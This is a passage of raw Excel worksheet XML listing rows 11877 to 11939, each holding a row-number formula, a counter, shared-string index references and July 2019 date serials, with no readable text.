        <v>43672</v>
      </c>
      <c r="E11877" t="s">
        <v>19640</v>
      </c>
      <c r="F11877" t="s">
        <v>9978</v>
      </c>
      <c r="G11877" t="s">
        <v>21981</v>
      </c>
    </row>
    <row r="11878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11878">
        <f t="shared" si="185"/>
        <v>11877</v>
      </c>
      <c r="B11878">
        <v>1877</v>
      </c>
      <c r="C11878" t="s">
        <v>19637</v>
      </c>
      <c r="D11878" s="1">
        <v>43673</v>
      </c>
      <c r="E11878" t="s">
        <v>19640</v>
      </c>
      <c r="F11878" t="s">
        <v>9975</v>
      </c>
      <c r="G11878" t="s">
        <v>21982</v>
      </c>
    </row>
    <row r="11879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11879">
        <f t="shared" si="185"/>
        <v>11878</v>
      </c>
      <c r="B11879">
        <v>1878</v>
      </c>
      <c r="C11879" t="s">
        <v>19637</v>
      </c>
      <c r="D11879" s="1">
        <v>43668</v>
      </c>
      <c r="E11879" t="s">
        <v>19640</v>
      </c>
      <c r="F11879" t="s">
        <v>10021</v>
      </c>
      <c r="G11879" t="s">
        <v>21983</v>
      </c>
    </row>
    <row r="11880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11880">
        <f t="shared" si="185"/>
        <v>11879</v>
      </c>
      <c r="B11880">
        <v>1879</v>
      </c>
      <c r="C11880" t="s">
        <v>19637</v>
      </c>
      <c r="D11880" s="1">
        <v>43669</v>
      </c>
      <c r="E11880" t="s">
        <v>19705</v>
      </c>
      <c r="F11880" t="s">
        <v>10021</v>
      </c>
      <c r="G11880" t="s">
        <v>21984</v>
      </c>
    </row>
    <row r="11881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11881">
        <f t="shared" si="185"/>
        <v>11880</v>
      </c>
      <c r="B11881">
        <v>1880</v>
      </c>
      <c r="C11881" t="s">
        <v>19637</v>
      </c>
      <c r="D11881" s="1">
        <v>43677</v>
      </c>
      <c r="E11881" t="s">
        <v>21985</v>
      </c>
      <c r="F11881" t="s">
        <v>10021</v>
      </c>
      <c r="G11881" t="s">
        <v>21986</v>
      </c>
    </row>
    <row r="11882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11882">
        <f t="shared" si="185"/>
        <v>11881</v>
      </c>
      <c r="B11882">
        <v>1881</v>
      </c>
      <c r="C11882" t="s">
        <v>19637</v>
      </c>
      <c r="D11882" s="1">
        <v>43673</v>
      </c>
      <c r="E11882" t="s">
        <v>19640</v>
      </c>
      <c r="F11882" t="s">
        <v>9975</v>
      </c>
      <c r="G11882" t="s">
        <v>21987</v>
      </c>
    </row>
    <row r="11883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11883">
        <f t="shared" si="185"/>
        <v>11882</v>
      </c>
      <c r="B11883">
        <v>1882</v>
      </c>
      <c r="C11883" t="s">
        <v>19637</v>
      </c>
      <c r="D11883" s="1">
        <v>43671</v>
      </c>
      <c r="E11883" t="s">
        <v>21988</v>
      </c>
      <c r="F11883" t="s">
        <v>9978</v>
      </c>
      <c r="G11883" t="s">
        <v>21989</v>
      </c>
    </row>
    <row r="11884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11884">
        <f t="shared" si="185"/>
        <v>11883</v>
      </c>
      <c r="B11884">
        <v>1883</v>
      </c>
      <c r="C11884" t="s">
        <v>19637</v>
      </c>
      <c r="D11884" s="1">
        <v>43676</v>
      </c>
      <c r="E11884" t="s">
        <v>19640</v>
      </c>
      <c r="F11884" t="s">
        <v>10021</v>
      </c>
      <c r="G11884" t="s">
        <v>21990</v>
      </c>
    </row>
    <row r="11885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11885">
        <f t="shared" si="185"/>
        <v>11884</v>
      </c>
      <c r="B11885">
        <v>1884</v>
      </c>
      <c r="C11885" t="s">
        <v>19637</v>
      </c>
      <c r="D11885" s="1">
        <v>43671</v>
      </c>
      <c r="F11885" t="s">
        <v>10526</v>
      </c>
      <c r="G11885" t="s">
        <v>21991</v>
      </c>
    </row>
    <row r="11886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11886">
        <f t="shared" si="185"/>
        <v>11885</v>
      </c>
      <c r="B11886">
        <v>1885</v>
      </c>
      <c r="C11886" t="s">
        <v>19637</v>
      </c>
      <c r="D11886" s="1">
        <v>43670</v>
      </c>
      <c r="F11886" t="s">
        <v>10526</v>
      </c>
      <c r="G11886" t="s">
        <v>21992</v>
      </c>
    </row>
    <row r="11887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11887">
        <f t="shared" si="185"/>
        <v>11886</v>
      </c>
      <c r="B11887">
        <v>1886</v>
      </c>
      <c r="C11887" t="s">
        <v>19637</v>
      </c>
      <c r="D11887" s="1">
        <v>43670</v>
      </c>
      <c r="E11887" t="s">
        <v>21993</v>
      </c>
      <c r="F11887" t="s">
        <v>10526</v>
      </c>
      <c r="G11887" t="s">
        <v>21994</v>
      </c>
    </row>
    <row r="11888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11888">
        <f t="shared" si="185"/>
        <v>11887</v>
      </c>
      <c r="B11888">
        <v>1887</v>
      </c>
      <c r="C11888" t="s">
        <v>19637</v>
      </c>
      <c r="D11888" s="1">
        <v>43673</v>
      </c>
      <c r="E11888" t="s">
        <v>19653</v>
      </c>
      <c r="F11888" t="s">
        <v>9975</v>
      </c>
      <c r="G11888" t="s">
        <v>21995</v>
      </c>
    </row>
    <row r="11889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11889">
        <f t="shared" si="185"/>
        <v>11888</v>
      </c>
      <c r="B11889">
        <v>1888</v>
      </c>
      <c r="C11889" t="s">
        <v>19637</v>
      </c>
      <c r="D11889" s="1">
        <v>43674</v>
      </c>
      <c r="E11889" t="s">
        <v>21996</v>
      </c>
      <c r="F11889" t="s">
        <v>9975</v>
      </c>
      <c r="G11889" t="s">
        <v>21997</v>
      </c>
    </row>
    <row r="11890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11890">
        <f t="shared" si="185"/>
        <v>11889</v>
      </c>
      <c r="B11890">
        <v>1889</v>
      </c>
      <c r="C11890" t="s">
        <v>19637</v>
      </c>
      <c r="D11890" s="1">
        <v>43674</v>
      </c>
      <c r="E11890" t="s">
        <v>20324</v>
      </c>
      <c r="F11890" t="s">
        <v>10526</v>
      </c>
      <c r="G11890" t="s">
        <v>21998</v>
      </c>
    </row>
    <row r="11891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11891">
        <f t="shared" si="185"/>
        <v>11890</v>
      </c>
      <c r="B11891">
        <v>1890</v>
      </c>
      <c r="C11891" t="s">
        <v>19637</v>
      </c>
      <c r="D11891" s="1">
        <v>43675</v>
      </c>
      <c r="E11891" t="s">
        <v>21389</v>
      </c>
      <c r="F11891" t="s">
        <v>9975</v>
      </c>
      <c r="G11891" t="s">
        <v>21999</v>
      </c>
    </row>
    <row r="11892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11892">
        <f t="shared" si="185"/>
        <v>11891</v>
      </c>
      <c r="B11892">
        <v>1891</v>
      </c>
      <c r="C11892" t="s">
        <v>19637</v>
      </c>
      <c r="D11892" s="1">
        <v>43672</v>
      </c>
      <c r="E11892" t="s">
        <v>20005</v>
      </c>
      <c r="F11892" t="s">
        <v>9975</v>
      </c>
      <c r="G11892" t="s">
        <v>22000</v>
      </c>
    </row>
    <row r="11893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11893">
        <f t="shared" si="185"/>
        <v>11892</v>
      </c>
      <c r="B11893">
        <v>1892</v>
      </c>
      <c r="C11893" t="s">
        <v>19637</v>
      </c>
      <c r="D11893" s="1">
        <v>43675</v>
      </c>
      <c r="E11893" t="s">
        <v>19640</v>
      </c>
      <c r="F11893" t="s">
        <v>10021</v>
      </c>
      <c r="G11893" t="s">
        <v>22001</v>
      </c>
    </row>
    <row r="11894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11894">
        <f t="shared" si="185"/>
        <v>11893</v>
      </c>
      <c r="B11894">
        <v>1893</v>
      </c>
      <c r="C11894" t="s">
        <v>19637</v>
      </c>
      <c r="D11894" s="1">
        <v>43672</v>
      </c>
      <c r="E11894" t="s">
        <v>21691</v>
      </c>
      <c r="F11894" t="s">
        <v>10526</v>
      </c>
      <c r="G11894" t="s">
        <v>22002</v>
      </c>
    </row>
    <row r="11895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11895">
        <f t="shared" si="185"/>
        <v>11894</v>
      </c>
      <c r="B11895">
        <v>1894</v>
      </c>
      <c r="C11895" t="s">
        <v>19637</v>
      </c>
      <c r="D11895" s="1">
        <v>43676</v>
      </c>
      <c r="E11895" t="s">
        <v>22003</v>
      </c>
      <c r="F11895" t="s">
        <v>9978</v>
      </c>
      <c r="G11895" t="s">
        <v>22004</v>
      </c>
    </row>
    <row r="11896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11896">
        <f t="shared" si="185"/>
        <v>11895</v>
      </c>
      <c r="B11896">
        <v>1895</v>
      </c>
      <c r="C11896" t="s">
        <v>19637</v>
      </c>
      <c r="D11896" s="1">
        <v>43669</v>
      </c>
      <c r="E11896" t="s">
        <v>19640</v>
      </c>
      <c r="F11896" t="s">
        <v>9975</v>
      </c>
      <c r="G11896" t="s">
        <v>22005</v>
      </c>
    </row>
    <row r="11897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11897">
        <f t="shared" si="185"/>
        <v>11896</v>
      </c>
      <c r="B11897">
        <v>1896</v>
      </c>
      <c r="C11897" t="s">
        <v>19637</v>
      </c>
      <c r="D11897" s="1">
        <v>43669</v>
      </c>
      <c r="F11897" t="s">
        <v>10526</v>
      </c>
      <c r="G11897" t="s">
        <v>22006</v>
      </c>
    </row>
    <row r="11898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11898">
        <f t="shared" si="185"/>
        <v>11897</v>
      </c>
      <c r="B11898">
        <v>1897</v>
      </c>
      <c r="C11898" t="s">
        <v>19637</v>
      </c>
      <c r="D11898" s="1">
        <v>43675</v>
      </c>
      <c r="E11898" t="s">
        <v>19643</v>
      </c>
      <c r="F11898" t="s">
        <v>10021</v>
      </c>
      <c r="G11898" t="s">
        <v>22007</v>
      </c>
    </row>
    <row r="11899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11899">
        <f t="shared" si="185"/>
        <v>11898</v>
      </c>
      <c r="B11899">
        <v>1898</v>
      </c>
      <c r="C11899" t="s">
        <v>19637</v>
      </c>
      <c r="D11899" s="1">
        <v>43670</v>
      </c>
      <c r="E11899" t="s">
        <v>22008</v>
      </c>
      <c r="F11899" t="s">
        <v>10526</v>
      </c>
      <c r="G11899" t="s">
        <v>22009</v>
      </c>
    </row>
    <row r="11900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11900">
        <f t="shared" si="185"/>
        <v>11899</v>
      </c>
      <c r="B11900">
        <v>1899</v>
      </c>
      <c r="C11900" t="s">
        <v>19637</v>
      </c>
      <c r="D11900" s="1">
        <v>43671</v>
      </c>
      <c r="E11900" t="s">
        <v>22010</v>
      </c>
      <c r="F11900" t="s">
        <v>10021</v>
      </c>
      <c r="G11900" t="s">
        <v>22011</v>
      </c>
    </row>
    <row r="11901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11901">
        <f t="shared" si="185"/>
        <v>11900</v>
      </c>
      <c r="B11901">
        <v>1900</v>
      </c>
      <c r="C11901" t="s">
        <v>19637</v>
      </c>
      <c r="D11901" s="1">
        <v>43675</v>
      </c>
      <c r="E11901" t="s">
        <v>19736</v>
      </c>
      <c r="F11901" t="s">
        <v>10526</v>
      </c>
      <c r="G11901" t="s">
        <v>22012</v>
      </c>
    </row>
    <row r="11902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11902">
        <f t="shared" si="185"/>
        <v>11901</v>
      </c>
      <c r="B11902">
        <v>1901</v>
      </c>
      <c r="C11902" t="s">
        <v>19637</v>
      </c>
      <c r="D11902" s="1">
        <v>43669</v>
      </c>
      <c r="F11902" t="s">
        <v>10021</v>
      </c>
      <c r="G11902" t="s">
        <v>22013</v>
      </c>
    </row>
    <row r="11903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11903">
        <f t="shared" si="185"/>
        <v>11902</v>
      </c>
      <c r="B11903">
        <v>1902</v>
      </c>
      <c r="C11903" t="s">
        <v>19637</v>
      </c>
      <c r="D11903" s="1">
        <v>43669</v>
      </c>
      <c r="E11903" t="s">
        <v>22014</v>
      </c>
      <c r="F11903" t="s">
        <v>9975</v>
      </c>
      <c r="G11903" t="s">
        <v>22015</v>
      </c>
    </row>
    <row r="11904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11904">
        <f t="shared" si="185"/>
        <v>11903</v>
      </c>
      <c r="B11904">
        <v>1903</v>
      </c>
      <c r="C11904" t="s">
        <v>19637</v>
      </c>
      <c r="D11904" s="1">
        <v>43674</v>
      </c>
      <c r="E11904" t="s">
        <v>19680</v>
      </c>
      <c r="F11904" t="s">
        <v>10021</v>
      </c>
      <c r="G11904" t="s">
        <v>22016</v>
      </c>
    </row>
    <row r="11905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11905">
        <f t="shared" si="185"/>
        <v>11904</v>
      </c>
      <c r="B11905">
        <v>1904</v>
      </c>
      <c r="C11905" t="s">
        <v>19637</v>
      </c>
      <c r="D11905" s="1">
        <v>43674</v>
      </c>
      <c r="E11905" t="s">
        <v>19648</v>
      </c>
      <c r="F11905" t="s">
        <v>10021</v>
      </c>
      <c r="G11905" t="s">
        <v>22017</v>
      </c>
    </row>
    <row r="11906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11906">
        <f t="shared" si="185"/>
        <v>11905</v>
      </c>
      <c r="B11906">
        <v>1905</v>
      </c>
      <c r="C11906" t="s">
        <v>19637</v>
      </c>
      <c r="D11906" s="1">
        <v>43676</v>
      </c>
      <c r="E11906" t="s">
        <v>19640</v>
      </c>
      <c r="F11906" t="s">
        <v>9975</v>
      </c>
      <c r="G11906" t="s">
        <v>22018</v>
      </c>
    </row>
    <row r="11907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11907">
        <f t="shared" ref="A11907:A11970" si="186">+ROW(A11906)</f>
        <v>11906</v>
      </c>
      <c r="B11907">
        <v>1906</v>
      </c>
      <c r="C11907" t="s">
        <v>19637</v>
      </c>
      <c r="D11907" s="1">
        <v>43675</v>
      </c>
      <c r="F11907" t="s">
        <v>10526</v>
      </c>
      <c r="G11907" t="s">
        <v>22019</v>
      </c>
    </row>
    <row r="11908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11908">
        <f t="shared" si="186"/>
        <v>11907</v>
      </c>
      <c r="B11908">
        <v>1907</v>
      </c>
      <c r="C11908" t="s">
        <v>19637</v>
      </c>
      <c r="D11908" s="1">
        <v>43675</v>
      </c>
      <c r="E11908" t="s">
        <v>19705</v>
      </c>
      <c r="F11908" t="s">
        <v>10021</v>
      </c>
      <c r="G11908" t="s">
        <v>22020</v>
      </c>
    </row>
    <row r="11909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11909">
        <f t="shared" si="186"/>
        <v>11908</v>
      </c>
      <c r="B11909">
        <v>1908</v>
      </c>
      <c r="C11909" t="s">
        <v>19637</v>
      </c>
      <c r="D11909" s="1">
        <v>43671</v>
      </c>
      <c r="E11909" t="s">
        <v>19638</v>
      </c>
      <c r="F11909" t="s">
        <v>10021</v>
      </c>
      <c r="G11909" t="s">
        <v>22021</v>
      </c>
    </row>
    <row r="11910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11910">
        <f t="shared" si="186"/>
        <v>11909</v>
      </c>
      <c r="B11910">
        <v>1909</v>
      </c>
      <c r="C11910" t="s">
        <v>19637</v>
      </c>
      <c r="D11910" s="1">
        <v>43672</v>
      </c>
      <c r="F11910" t="s">
        <v>10526</v>
      </c>
      <c r="G11910" t="s">
        <v>22022</v>
      </c>
    </row>
    <row r="11911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11911">
        <f t="shared" si="186"/>
        <v>11910</v>
      </c>
      <c r="B11911">
        <v>1910</v>
      </c>
      <c r="C11911" t="s">
        <v>19637</v>
      </c>
      <c r="D11911" s="1">
        <v>43676</v>
      </c>
      <c r="E11911" t="s">
        <v>19650</v>
      </c>
      <c r="F11911" t="s">
        <v>10021</v>
      </c>
      <c r="G11911" t="s">
        <v>22023</v>
      </c>
    </row>
    <row r="11912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11912">
        <f t="shared" si="186"/>
        <v>11911</v>
      </c>
      <c r="B11912">
        <v>1911</v>
      </c>
      <c r="C11912" t="s">
        <v>19637</v>
      </c>
      <c r="D11912" s="1">
        <v>43675</v>
      </c>
      <c r="E11912" t="s">
        <v>21297</v>
      </c>
      <c r="F11912" t="s">
        <v>10526</v>
      </c>
      <c r="G11912" t="s">
        <v>22024</v>
      </c>
    </row>
    <row r="11913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11913">
        <f t="shared" si="186"/>
        <v>11912</v>
      </c>
      <c r="B11913">
        <v>1912</v>
      </c>
      <c r="C11913" t="s">
        <v>19637</v>
      </c>
      <c r="D11913" s="1">
        <v>43675</v>
      </c>
      <c r="E11913" t="s">
        <v>21345</v>
      </c>
      <c r="F11913" t="s">
        <v>10021</v>
      </c>
      <c r="G11913" t="s">
        <v>22025</v>
      </c>
    </row>
    <row r="11914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11914">
        <f t="shared" si="186"/>
        <v>11913</v>
      </c>
      <c r="B11914">
        <v>1913</v>
      </c>
      <c r="C11914" t="s">
        <v>19637</v>
      </c>
      <c r="D11914" s="1">
        <v>43670</v>
      </c>
      <c r="F11914" t="s">
        <v>9975</v>
      </c>
      <c r="G11914" t="s">
        <v>22026</v>
      </c>
    </row>
    <row r="11915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11915">
        <f t="shared" si="186"/>
        <v>11914</v>
      </c>
      <c r="B11915">
        <v>1914</v>
      </c>
      <c r="C11915" t="s">
        <v>19637</v>
      </c>
      <c r="D11915" s="1">
        <v>43669</v>
      </c>
      <c r="E11915" t="s">
        <v>22027</v>
      </c>
      <c r="F11915" t="s">
        <v>9978</v>
      </c>
      <c r="G11915" t="s">
        <v>22028</v>
      </c>
    </row>
    <row r="11916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11916">
        <f t="shared" si="186"/>
        <v>11915</v>
      </c>
      <c r="B11916">
        <v>1915</v>
      </c>
      <c r="C11916" t="s">
        <v>19637</v>
      </c>
      <c r="D11916" s="1">
        <v>43669</v>
      </c>
      <c r="F11916" t="s">
        <v>10021</v>
      </c>
      <c r="G11916" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="11917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11917">
        <f t="shared" si="186"/>
        <v>11916</v>
      </c>
      <c r="B11917">
        <v>1916</v>
      </c>
      <c r="C11917" t="s">
        <v>19637</v>
      </c>
      <c r="D11917" s="1">
        <v>43668</v>
      </c>
      <c r="E11917" t="s">
        <v>19640</v>
      </c>
      <c r="F11917" t="s">
        <v>9975</v>
      </c>
      <c r="G11917" t="s">
        <v>22029</v>
      </c>
    </row>
    <row r="11918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11918">
        <f t="shared" si="186"/>
        <v>11917</v>
      </c>
      <c r="B11918">
        <v>1917</v>
      </c>
      <c r="C11918" t="s">
        <v>19637</v>
      </c>
      <c r="D11918" s="1">
        <v>43676</v>
      </c>
      <c r="E11918" t="s">
        <v>22030</v>
      </c>
      <c r="F11918" t="s">
        <v>10021</v>
      </c>
      <c r="G11918" t="s">
        <v>22031</v>
      </c>
    </row>
    <row r="11919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11919">
        <f t="shared" si="186"/>
        <v>11918</v>
      </c>
      <c r="B11919">
        <v>1918</v>
      </c>
      <c r="C11919" t="s">
        <v>19637</v>
      </c>
      <c r="D11919" s="1">
        <v>43669</v>
      </c>
      <c r="F11919" t="s">
        <v>10526</v>
      </c>
      <c r="G11919" t="s">
        <v>22032</v>
      </c>
    </row>
    <row r="11920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11920">
        <f t="shared" si="186"/>
        <v>11919</v>
      </c>
      <c r="B11920">
        <v>1919</v>
      </c>
      <c r="C11920" t="s">
        <v>19637</v>
      </c>
      <c r="D11920" s="1">
        <v>43672</v>
      </c>
      <c r="E11920" t="s">
        <v>19705</v>
      </c>
      <c r="F11920" t="s">
        <v>10021</v>
      </c>
      <c r="G11920" t="s">
        <v>22033</v>
      </c>
    </row>
    <row r="11921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11921">
        <f t="shared" si="186"/>
        <v>11920</v>
      </c>
      <c r="B11921">
        <v>1920</v>
      </c>
      <c r="C11921" t="s">
        <v>19637</v>
      </c>
      <c r="D11921" s="1">
        <v>43677</v>
      </c>
      <c r="E11921" t="s">
        <v>21834</v>
      </c>
      <c r="F11921" t="s">
        <v>10526</v>
      </c>
      <c r="G11921" t="s">
        <v>22034</v>
      </c>
    </row>
    <row r="11922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11922">
        <f t="shared" si="186"/>
        <v>11921</v>
      </c>
      <c r="B11922">
        <v>1921</v>
      </c>
      <c r="C11922" t="s">
        <v>19637</v>
      </c>
      <c r="D11922" s="1">
        <v>43668</v>
      </c>
      <c r="E11922" t="s">
        <v>20220</v>
      </c>
      <c r="F11922" t="s">
        <v>10021</v>
      </c>
      <c r="G11922" t="s">
        <v>22035</v>
      </c>
    </row>
    <row r="11923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11923">
        <f t="shared" si="186"/>
        <v>11922</v>
      </c>
      <c r="B11923">
        <v>1922</v>
      </c>
      <c r="C11923" t="s">
        <v>19637</v>
      </c>
      <c r="D11923" s="1">
        <v>43674</v>
      </c>
      <c r="E11923" t="s">
        <v>22036</v>
      </c>
      <c r="F11923" t="s">
        <v>10526</v>
      </c>
      <c r="G11923" t="s">
        <v>22037</v>
      </c>
    </row>
    <row r="11924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11924">
        <f t="shared" si="186"/>
        <v>11923</v>
      </c>
      <c r="B11924">
        <v>1923</v>
      </c>
      <c r="C11924" t="s">
        <v>19637</v>
      </c>
      <c r="D11924" s="1">
        <v>43671</v>
      </c>
      <c r="E11924" t="s">
        <v>19750</v>
      </c>
      <c r="F11924" t="s">
        <v>9978</v>
      </c>
      <c r="G11924" t="s">
        <v>22038</v>
      </c>
    </row>
    <row r="11925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11925">
        <f t="shared" si="186"/>
        <v>11924</v>
      </c>
      <c r="B11925">
        <v>1924</v>
      </c>
      <c r="C11925" t="s">
        <v>19637</v>
      </c>
      <c r="D11925" s="1">
        <v>43674</v>
      </c>
      <c r="E11925" t="s">
        <v>22039</v>
      </c>
      <c r="F11925" t="s">
        <v>10526</v>
      </c>
      <c r="G11925" t="s">
        <v>22040</v>
      </c>
    </row>
    <row r="11926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11926">
        <f t="shared" si="186"/>
        <v>11925</v>
      </c>
      <c r="B11926">
        <v>1925</v>
      </c>
      <c r="C11926" t="s">
        <v>19637</v>
      </c>
      <c r="D11926" s="1">
        <v>43671</v>
      </c>
      <c r="E11926" t="s">
        <v>22041</v>
      </c>
      <c r="F11926" t="s">
        <v>10526</v>
      </c>
      <c r="G11926" t="s">
        <v>22042</v>
      </c>
    </row>
    <row r="11927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11927">
        <f t="shared" si="186"/>
        <v>11926</v>
      </c>
      <c r="B11927">
        <v>1926</v>
      </c>
      <c r="C11927" t="s">
        <v>19637</v>
      </c>
      <c r="D11927" s="1">
        <v>43672</v>
      </c>
      <c r="E11927" t="s">
        <v>19687</v>
      </c>
      <c r="F11927" t="s">
        <v>10021</v>
      </c>
      <c r="G11927" t="s">
        <v>22043</v>
      </c>
    </row>
    <row r="11928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11928">
        <f t="shared" si="186"/>
        <v>11927</v>
      </c>
      <c r="B11928">
        <v>1927</v>
      </c>
      <c r="C11928" t="s">
        <v>19637</v>
      </c>
      <c r="D11928" s="1">
        <v>43673</v>
      </c>
      <c r="F11928" t="s">
        <v>10526</v>
      </c>
      <c r="G11928" t="s">
        <v>22044</v>
      </c>
    </row>
    <row r="11929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11929">
        <f t="shared" si="186"/>
        <v>11928</v>
      </c>
      <c r="B11929">
        <v>1928</v>
      </c>
      <c r="C11929" t="s">
        <v>19637</v>
      </c>
      <c r="D11929" s="1">
        <v>43671</v>
      </c>
      <c r="E11929" t="s">
        <v>19640</v>
      </c>
      <c r="F11929" t="s">
        <v>9975</v>
      </c>
      <c r="G11929" t="s">
        <v>22045</v>
      </c>
    </row>
    <row r="11930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11930">
        <f t="shared" si="186"/>
        <v>11929</v>
      </c>
      <c r="B11930">
        <v>1929</v>
      </c>
      <c r="C11930" t="s">
        <v>19637</v>
      </c>
      <c r="D11930" s="1">
        <v>43668</v>
      </c>
      <c r="E11930" t="s">
        <v>19750</v>
      </c>
      <c r="F11930" t="s">
        <v>9978</v>
      </c>
      <c r="G11930" t="s">
        <v>22046</v>
      </c>
    </row>
    <row r="11931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11931">
        <f t="shared" si="186"/>
        <v>11930</v>
      </c>
      <c r="B11931">
        <v>1930</v>
      </c>
      <c r="C11931" t="s">
        <v>19637</v>
      </c>
      <c r="D11931" s="1">
        <v>43672</v>
      </c>
      <c r="E11931" t="s">
        <v>19879</v>
      </c>
      <c r="F11931" t="s">
        <v>10021</v>
      </c>
      <c r="G11931" t="s">
        <v>22047</v>
      </c>
    </row>
    <row r="11932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11932">
        <f t="shared" si="186"/>
        <v>11931</v>
      </c>
      <c r="B11932">
        <v>1931</v>
      </c>
      <c r="C11932" t="s">
        <v>19637</v>
      </c>
      <c r="D11932" s="1">
        <v>43676</v>
      </c>
      <c r="F11932" t="s">
        <v>10526</v>
      </c>
      <c r="G11932" t="s">
        <v>22048</v>
      </c>
    </row>
    <row r="11933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11933">
        <f t="shared" si="186"/>
        <v>11932</v>
      </c>
      <c r="B11933">
        <v>1932</v>
      </c>
      <c r="C11933" t="s">
        <v>19637</v>
      </c>
      <c r="D11933" s="1">
        <v>43674</v>
      </c>
      <c r="E11933" t="s">
        <v>19680</v>
      </c>
      <c r="F11933" t="s">
        <v>10021</v>
      </c>
      <c r="G11933" t="s">
        <v>22049</v>
      </c>
    </row>
    <row r="11934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11934">
        <f t="shared" si="186"/>
        <v>11933</v>
      </c>
      <c r="B11934">
        <v>1933</v>
      </c>
      <c r="C11934" t="s">
        <v>19637</v>
      </c>
      <c r="D11934" s="1">
        <v>43676</v>
      </c>
      <c r="E11934" t="s">
        <v>19820</v>
      </c>
      <c r="F11934" t="s">
        <v>9978</v>
      </c>
      <c r="G11934" t="s">
        <v>22050</v>
      </c>
    </row>
    <row r="11935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11935">
        <f t="shared" si="186"/>
        <v>11934</v>
      </c>
      <c r="B11935">
        <v>1934</v>
      </c>
      <c r="C11935" t="s">
        <v>19637</v>
      </c>
      <c r="D11935" s="1">
        <v>43676</v>
      </c>
      <c r="E11935" t="s">
        <v>19727</v>
      </c>
      <c r="F11935" t="s">
        <v>9975</v>
      </c>
      <c r="G11935" t="s">
        <v>19728</v>
      </c>
    </row>
    <row r="11936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11936">
        <f t="shared" si="186"/>
        <v>11935</v>
      </c>
      <c r="B11936">
        <v>1935</v>
      </c>
      <c r="C11936" t="s">
        <v>19637</v>
      </c>
      <c r="D11936" s="1">
        <v>43676</v>
      </c>
      <c r="F11936" t="s">
        <v>10021</v>
      </c>
      <c r="G11936" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="11937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11937">
        <f t="shared" si="186"/>
        <v>11936</v>
      </c>
      <c r="B11937">
        <v>1936</v>
      </c>
      <c r="C11937" t="s">
        <v>19637</v>
      </c>
      <c r="D11937" s="1">
        <v>43668</v>
      </c>
      <c r="E11937" t="s">
        <v>19687</v>
      </c>
      <c r="F11937" t="s">
        <v>10021</v>
      </c>
      <c r="G11937" t="s">
        <v>22051</v>
      </c>
    </row>
    <row r="11938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11938">
        <f t="shared" si="186"/>
        <v>11937</v>
      </c>
      <c r="B11938">
        <v>1937</v>
      </c>
      <c r="C11938" t="s">
        <v>19637</v>
      </c>
      <c r="D11938" s="1">
        <v>43675</v>
      </c>
      <c r="F11938" t="s">
        <v>9978</v>
      </c>
      <c r="G11938" t="s">
        <v>22052</v>
      </c>
    </row>
    <row r="11939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11939">
        <f t="shared" si="186"/>
        <v>11938</v>
      </c>
      <c r="B11939">
        <v>1938</v>
      </c>
      <c r="C11939" t="s">
        <v>19637</v>
      </c>
      <c r="D11939" s="1">
        <v>43671</v>
      </c>
      <c r="E11939" t="s">
        <v>22053</v>
      </c>
      <c r="F11939" t="s">
        <v>9975</v>
      </c>
      <c r="G11939" t="s">
        <v>22054</v>
      </c>
